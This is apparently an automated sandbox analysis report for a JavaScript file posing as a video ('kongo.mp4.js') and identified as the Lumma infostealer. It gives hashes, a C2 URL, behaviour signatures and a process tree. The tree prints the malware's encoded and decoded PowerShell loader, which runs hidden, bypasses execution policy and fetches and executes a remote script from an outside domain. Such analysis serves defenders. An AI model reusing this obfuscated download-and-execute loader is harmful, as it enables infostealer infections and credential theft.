Analysis

  • max time kernel
    96s
  • max time network
    144s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241211-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    08-01-2025 18:47

General

  • Target

    kongo.mp4.js

  • Size

    102KB

  • MD5

    3c38beb47e908f44e723eeecc9263200

  • SHA1

    aa1a371919fe804ab727bb65c1a7bb96224014a9

  • SHA256

    9f31852148ac6004937ef640870d442afaa1a1064aa2cf540ec0db4827c8aee3

  • SHA512

    46608dec2ca73d340fcefac08c74ed20a5395378777431d6a911b4192765946c09f8aa54485496341f12c9451f068a81e63c05197e4c83f51a32da98ef5967b4

  • SSDEEP

    3072:uRKoa6RMqYPXIJOjW47hnrX2D45IbhmwOho2Big:uRFYPYU97hnrGD3mwOu2BN

Malware Config

Extracted

Family

lumma

C2

https://charminammoc.cyou/api

Signatures

  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 1 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3524
      • C:\Windows\system32\wscript.exe
        wscript.exe C:\Users\Admin\AppData\Local\Temp\kongo.mp4.js
        2⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:5096
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwAtAHcAJwAsACcAaABpAGQAZABlAG4AJwAsACcALQBlAHAAJwAsACcAYgB5AHAAYQBzAHMAJwAsACcALQBuAG8AcAAnACwAJwAtAEMAbwBtAG0AYQBuAGQAJwAsACcAZwBkAHIAIAAtACoAOwBTAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAEMAaQBVACAAKAAuACQARQB4AGUAYwB1AHQAaQBvAG4AQwBvAG4AdABlAHgAdAAuACgAKAAkAEUAeABlAGMAdQB0AGkAbwBuAEMAbwBuAHQAZQB4AHQAfABNAGUAbQBiAGUAcgApAFsANgBdAC4ATgBhAG0AZQApAC4AKAAoACQARQB4AGUAYwB1AHQAaQBvAG4AQwBvAG4AdABlAHgAdAAuACgAKAAkAEUAeABlAGMAdQB0AGkAbwBuAEMAbwBuAHQAZQB4AHQAfABNAGUAbQBiAGUAcgApAFsANgBdAC4ATgBhAG0AZQApAHwATQBlAG0AYgBlAHIAfABXAGgAZQByAGUALQBPAGIAagBlAGMAdAB7ACQAXwAuAE4AYQBtAGUALQBsAGkAawBlACcAJwAqAHQAKgBvAG0AKgBkACcAJwB9ACkALgBOAGEAbQBlACkALgBJAG4AdgBvAGsAZQAoACQARQB4AGUAYwB1AHQAaQBvAG4AQwBvAG4AdABlAHgAdAAuACgAKAAkAEUAeABlAGMAdQB0AGkAbwBuAEMAbwBuAHQAZQB4AHQAfABNAGUAbQBiAGUAcgApAFsANgBdAC4ATgBhAG0AZQApAC4AKAAoACQARQB4AGUAYwB1AHQAaQBvAG4AQwBvAG4AdABlAHgAdAAuACgAKAAkAEUAeABlAGMAdQB0AGkAbwBuAEMAbwBuAHQAZQB4AHQAfABNAGUAbQBiAGUAcgApAFsANgBdAC4ATgBhAG0AZQApAC4AUABzAE8AYgBqAGUAYwB0AC4ATQBlAHQAaABvAGQAcwB8AFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0AHsAJABfAC4ATgBhAG0AZQAtAGwAaQBrAGUAJwAnACoAbwBtACoAZQAnACcAfQApAC4ATgBhAG0AZQApAC4ASQBuAHYAbwBrAGUAKAAnACcATgAqAC0ATwAqACcAJwAsACQAVABSAFUARQAsACQAVABSAFUARQApACwAWwBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEMAbwBtAG0AYQBuAGQAVAB5AHAAZQBzAF0AOgA6AEMAbQBkAGwAZQB0ACkATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApADsAUwBlAHQALQBJAHQAZQBtACAAVgBhAHIAaQBhAGIAbABlADoALwBsAFcAIAAnACcAaAB0AHQAcABzADoALwAvAGsAbABpAHAAZABlAHIAaQBxAC4AcwBoAG8AcAAvAHMAaAAnACcAOwBbAFMAYwByAGkAcAB0AEIAbABvAGMAawBdADoAOgBDAHIAZQBhAHQAZQAoACgARwBJACAAVgBhAHIAaQBhAGIAbABlADoAQwBpAFUAKQAuAFYAYQBsAHUAZQAuACgAKAAoACgARwBJACAAVgBhAHIAaQBhAGIAbABlADoAQwBpAFUAKQAuAFYAYQBsAHUAZQB8AE0AZQBtAGIAZQByACkAfABXAGgAZQByAGUALQBPAGIAagBlAGMAdAB7ACQAXwAuAE4AYQBtAGUALQBsAGkAawBlACcAJwAqAG4AbAAqAGcAJwAnAH0AKQAuAE4AYQBtAGUAKQAuAEkAbgB2AG8AawBlACgAKABWAGEAcgBpAGEAYgBsAGUAIABsAFcAKQAuAFYAYQBsAHUAZQApACkALgBJAG4AdgBvAGsAZQBSAGUAdAB1AHIAbgBBAHMASQBzACgAKQAnAA==
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4184
          • C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://klipderiq.shop/sh';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs()
            4⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1060
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3608
        • C:\Windows\system32\wscript.exe
          wscript kongo.mp4.js
          3⤵
            PID:3252
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe"
          2⤵
          • Blocklisted process makes network request
          • System Location Discovery: System Language Discovery
          PID:1704

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        64B

        MD5

        50a8221b93fbd2628ac460dd408a9fc1

        SHA1

        7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

        SHA256

        46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

        SHA512

        27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ler1fvm5.duh.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • memory/1060-102-0x0000000007EB0000-0x0000000007FD3000-memory.dmp

        Filesize

        1.1MB

      • memory/1060-18-0x0000000004C10000-0x00000000052DA000-memory.dmp

        Filesize

        6.8MB

      • memory/1060-26-0x0000000005420000-0x0000000005486000-memory.dmp

        Filesize

        408KB

      • memory/1060-96-0x0000000007EB0000-0x0000000007FD3000-memory.dmp

        Filesize

        1.1MB

      • memory/1060-1373-0x0000000005D70000-0x0000000005DC4000-memory.dmp

        Filesize

        336KB

      • memory/1060-19-0x0000000005310000-0x0000000005332000-memory.dmp

        Filesize

        136KB

      • memory/1060-31-0x0000000005650000-0x00000000059A7000-memory.dmp

        Filesize

        3.3MB

      • memory/1060-98-0x0000000007EB0000-0x0000000007FD3000-memory.dmp

        Filesize

        1.1MB

      • memory/1060-33-0x0000000005B50000-0x0000000005B6E000-memory.dmp

        Filesize

        120KB

      • memory/1060-34-0x0000000005BA0000-0x0000000005BEC000-memory.dmp

        Filesize

        304KB

      • memory/1060-35-0x0000000006B00000-0x0000000006B96000-memory.dmp

        Filesize

        600KB

      • memory/1060-37-0x00000000060E0000-0x0000000006102000-memory.dmp

        Filesize

        136KB

      • memory/1060-36-0x0000000006090000-0x00000000060AA000-memory.dmp

        Filesize

        104KB

      • memory/1060-38-0x00000000073D0000-0x0000000007976000-memory.dmp

        Filesize

        5.6MB

      • memory/1060-39-0x0000000006E70000-0x0000000006EBA000-memory.dmp

        Filesize

        296KB

      • memory/1060-40-0x0000000008000000-0x000000000867A000-memory.dmp

        Filesize

        6.5MB

      • memory/1060-42-0x0000000075070000-0x0000000075821000-memory.dmp

        Filesize

        7.7MB

      • memory/1060-43-0x0000000007200000-0x000000000735C000-memory.dmp

        Filesize

        1.4MB

      • memory/1060-44-0x0000000007B50000-0x0000000007C82000-memory.dmp

        Filesize

        1.2MB

      • memory/1060-45-0x0000000007D80000-0x0000000007EA8000-memory.dmp

        Filesize

        1.2MB

      • memory/1060-46-0x0000000007EB0000-0x0000000007FDA000-memory.dmp

        Filesize

        1.2MB

      • memory/1060-47-0x0000000007EB0000-0x0000000007FD3000-memory.dmp

        Filesize

        1.1MB

      • memory/1060-50-0x0000000007EB0000-0x0000000007FD3000-memory.dmp

        Filesize

        1.1MB

      • memory/1060-72-0x0000000007EB0000-0x0000000007FD3000-memory.dmp

        Filesize

        1.1MB

      • memory/1060-94-0x0000000007EB0000-0x0000000007FD3000-memory.dmp

        Filesize

        1.1MB

      • memory/1060-108-0x0000000007EB0000-0x0000000007FD3000-memory.dmp

        Filesize

        1.1MB

      • memory/1060-106-0x0000000007EB0000-0x0000000007FD3000-memory.dmp

        Filesize

        1.1MB

      • memory/1060-104-0x0000000007EB0000-0x0000000007FD3000-memory.dmp

        Filesize

        1.1MB

      • memory/1060-17-0x0000000004500000-0x0000000004536000-memory.dmp

        Filesize

        216KB

      • memory/1060-100-0x0000000007EB0000-0x0000000007FD3000-memory.dmp

        Filesize

        1.1MB

      • memory/1060-92-0x0000000007EB0000-0x0000000007FD3000-memory.dmp

        Filesize

        1.1MB

      • memory/1060-1371-0x00000000054E0000-0x000000000552C000-memory.dmp

        Filesize

        304KB

      • memory/1060-25-0x00000000053B0000-0x0000000005416000-memory.dmp

        Filesize

        408KB

      • memory/1060-91-0x0000000007EB0000-0x0000000007FD3000-memory.dmp

        Filesize

        1.1MB

      • memory/1060-88-0x0000000007EB0000-0x0000000007FD3000-memory.dmp

        Filesize

        1.1MB

      • memory/1060-86-0x0000000007EB0000-0x0000000007FD3000-memory.dmp

        Filesize

        1.1MB

      • memory/1060-84-0x0000000007EB0000-0x0000000007FD3000-memory.dmp

        Filesize

        1.1MB

      • memory/1060-82-0x0000000007EB0000-0x0000000007FD3000-memory.dmp

        Filesize

        1.1MB

      • memory/1060-80-0x0000000007EB0000-0x0000000007FD3000-memory.dmp

        Filesize

        1.1MB

      • memory/1060-78-0x0000000007EB0000-0x0000000007FD3000-memory.dmp

        Filesize

        1.1MB

      • memory/1060-76-0x0000000007EB0000-0x0000000007FD3000-memory.dmp

        Filesize

        1.1MB

      • memory/1060-74-0x0000000007EB0000-0x0000000007FD3000-memory.dmp

        Filesize

        1.1MB

      • memory/1060-68-0x0000000007EB0000-0x0000000007FD3000-memory.dmp

        Filesize

        1.1MB

      • memory/1060-66-0x0000000007EB0000-0x0000000007FD3000-memory.dmp

        Filesize

        1.1MB

      • memory/1060-64-0x0000000007EB0000-0x0000000007FD3000-memory.dmp

        Filesize

        1.1MB

      • memory/1060-62-0x0000000007EB0000-0x0000000007FD3000-memory.dmp

        Filesize

        1.1MB

      • memory/1060-70-0x0000000007EB0000-0x0000000007FD3000-memory.dmp

        Filesize

        1.1MB

      • memory/1060-60-0x0000000007EB0000-0x0000000007FD3000-memory.dmp

        Filesize

        1.1MB

      • memory/1060-58-0x0000000007EB0000-0x0000000007FD3000-memory.dmp

        Filesize

        1.1MB

      • memory/1060-56-0x0000000007EB0000-0x0000000007FD3000-memory.dmp

        Filesize

        1.1MB

      • memory/1060-54-0x0000000007EB0000-0x0000000007FD3000-memory.dmp

        Filesize

        1.1MB

      • memory/1060-52-0x0000000007EB0000-0x0000000007FD3000-memory.dmp

        Filesize

        1.1MB

      • memory/1060-48-0x0000000007EB0000-0x0000000007FD3000-memory.dmp

        Filesize

        1.1MB

      • memory/1060-1369-0x000000002B6E0000-0x000000002B764000-memory.dmp

        Filesize

        528KB

      • memory/1060-1370-0x000000002B760000-0x000000002B7E0000-memory.dmp

        Filesize

        512KB

      • memory/4184-12-0x00007FFA00F50000-0x00007FFA01A12000-memory.dmp

        Filesize

        10.8MB

      • memory/4184-10-0x00000208EBFD0000-0x00000208EBFF2000-memory.dmp

        Filesize

        136KB

      • memory/4184-11-0x00007FFA00F50000-0x00007FFA01A12000-memory.dmp

        Filesize

        10.8MB

      • memory/4184-0-0x00007FFA00F53000-0x00007FFA00F55000-memory.dmp

        Filesize

        8KB

      • memory/4184-13-0x00007FFA00F50000-0x00007FFA01A12000-memory.dmp

        Filesize

        10.8MB

      • memory/4184-16-0x00007FFA00F50000-0x00007FFA01A12000-memory.dmp

        Filesize

        10.8MB